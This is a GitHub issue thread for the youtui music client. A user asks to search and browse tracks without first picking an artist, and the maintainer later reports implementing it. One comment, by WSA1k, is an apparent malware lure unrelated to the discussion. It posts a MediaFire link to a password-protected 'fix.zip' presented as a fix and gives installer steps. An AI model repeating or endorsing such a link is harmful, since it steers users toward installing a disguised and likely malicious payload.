### ISSUE TITLE
RFE: Browsing tracks (without selecting an artist)

### ISSUE THREAD

**Issue by rkratky** [nick42d/youtui#153]
Not sure if this is related:

"* Only the tracking url from GetSong is implemented - as GetSongTrackingUrl. Any additional features for GetSong are not currently planned - recommend taking a look at rusty_ytdl library for these features."

However, it would be nice to be able to browse through "raw" search results, i.e. without needing to select an artist, thus limiting the results to that artist only.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nick42d** [comment]
> Not sure if this is related:
> 
> "* Only the tracking url from GetSong is implemented - as GetSongTrackingUrl. Any additional features for GetSong are not currently planned - recommend taking a look at rusty_ytdl library for these features."
> 
> However, it would be nice to be able to browse through "raw" search results, i.e. without needing to select an artist, thus limiting the results to that artist only.

That quote refers to a backend api component. Do you mean ability to search and receive a list of matching songs only? The API is capable, but the UI will require some design. There are other things we could search too - Albums or Playlists, and so I'd like to find a clean design that allows for all these options.

I must admit this is lower priority personally for me, as one of the motivations behind youtui was to easily display an entire artists discography - not so easy with the web app.

**Comment by rkratky** [comment]
> Do you mean ability to search and receive a list of matching songs only?

Yes. I use it quite often when I'm interested in various versions of the same song (both by the same artist and by different artists).

> There are other things we could search too - Albums or Playlists, and so I'd like to find a clean design that allows for all these options.

Right. Perhaps (off the top of my head), submitting the search query could result in multiple category columns. Now there's just one: Artists. Could there by 4 next to each other (Artists, Tracks, Albums, Playlists), i.e. (partially) covering the big Songs field? Up/down to browse in a column, left/right to jump between columns. When you select and hit Enter in whichever column, the UI goes back to "normal". The left column would then be the one from which you chose.

> I must admit this is lower priority personally for me, as one of the motivations behind youtui was to easily display an entire artists discography - not so easy with the web app.

Understood :) I'd appreciate it, but I don't know enough Rust to contribute, so if/when you get to it :)

**Comment by nick42d** [comment]
Implemented song search feature in #220 . Press F6 to change search type between artists and songs.
